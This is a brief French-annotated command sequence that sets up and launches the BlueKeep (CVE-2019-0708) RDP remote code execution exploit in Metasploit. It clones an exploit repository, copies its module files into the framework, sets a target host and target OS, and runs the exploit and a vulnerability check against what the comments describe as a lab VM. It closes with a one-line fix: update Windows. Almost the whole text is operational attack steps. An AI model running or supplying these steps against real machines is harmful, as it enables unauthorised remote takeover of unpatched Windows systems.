# Download exploit
git clone https://github.com/TinToSer/bluekeep-exploit
# remplacer ces fichiers
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp /
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp /
# Pour une utilisation propre, créer le répertoire contenant l'exploit
mkdir /usr/share/metasploit-framework/modules/exploit/rdp
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploit/rdp/
# Ensuite on peut lancer l'exploit
msfdb start
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOST 192.168.56.101 (ex:@ip vm)
set TARGET 2 (sélection os sytem vm)
run (ou exploit)
# Pour effectuer un check
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOST 192.168.56.101
run
Solution
Mettre à jour Windows